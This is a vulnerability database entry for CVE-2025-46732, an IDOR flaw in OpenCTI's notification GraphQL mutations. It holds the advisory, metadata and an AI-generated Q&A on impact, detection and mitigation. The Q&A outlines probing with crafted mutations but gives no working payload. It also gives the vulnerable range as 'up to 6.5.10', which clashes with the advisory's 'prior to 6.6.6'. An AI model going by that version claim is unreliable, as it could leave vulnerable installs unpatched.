CVE-2025-46732
Unknown Unknown - Not Provided
BaseFortify

Publication date: 2025-07-18

Last updated on: 2025-08-05

Assigner: GitHub, Inc.

Description
OpenCTI is an open source platform for managing cyber threat intelligence knowledge and observables. Prior to version 6.6.6, an IDOR vulnerability in the GrapQL `NotificationLineNotificationMarkReadMutation` and `NotificationLineNotificationDeleteMutation` mutations of OpenCTI allows an authenticated user to change the read status of a notification or delete a notification of another user in case he has knowledge of the UUID of the notification. When changing the read status of a notification, the user also receives the content of the notification they changed the read status of. Authenticated Users in OpenCTI can read, modify and delete notification of other users if they know the UUID of the notification. Version 6.6.6 fixes the issue.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2025-07-18
Last Modified
2025-08-05
Generated
2026-05-07
AI Q&A
2025-07-18
EPSS Evaluated
2026-05-05
NVD
CVE-2025-46732
EUVD
EUVD-2025-21883
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
citeum opencti to 6.6.6 (exc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-285 The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action.
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?

This vulnerability is an Insecure Direct Object Reference (IDOR) in the OpenCTI platform before version 6.6.6. It affects specific GraphQL mutations that handle notifications. An authenticated user who knows the UUID of another user's notification can change the read status or delete that notification. Additionally, when changing the read status, the attacker can view the content of the other user's notification. This happens because the system does not properly enforce authorization checks on these actions. [1]


How can this vulnerability impact me? :

This vulnerability can allow an authenticated user to read, modify, or delete notifications belonging to other users without proper authorization. This could lead to unauthorized disclosure of notification content and manipulation or removal of notifications, potentially disrupting user awareness or workflow within the OpenCTI platform. [1]


How can this vulnerability be detected on my network or system? Can you suggest some commands?

Detection of this vulnerability involves verifying if your OpenCTI instance is running a vulnerable version (up to 6.5.10) and testing if an authenticated user can modify or delete notifications of other users by using the GraphQL mutations NotificationLineNotificationMarkReadMutation or NotificationLineNotificationDeleteMutation with known notification UUIDs. Specific commands would involve sending crafted GraphQL mutation requests to the OpenCTI API endpoint to attempt to change the read status or delete notifications not belonging to the authenticated user. For example, using curl or a GraphQL client to send mutations with different UUIDs and observing if unauthorized changes are accepted. [1]


What immediate steps should I take to mitigate this vulnerability?

The immediate mitigation step is to upgrade OpenCTI to version 6.6.6 or later, where this IDOR vulnerability is fixed. Until the upgrade can be performed, restrict access to the OpenCTI platform to trusted users only, monitor for suspicious activity involving notification mutations, and consider implementing additional access controls or network restrictions to limit exploitation. [1]


Ask Our AI Assistant
Need more information? Ask your question to get an AI reply (Powered by our expertise)
0/70
EPSS Chart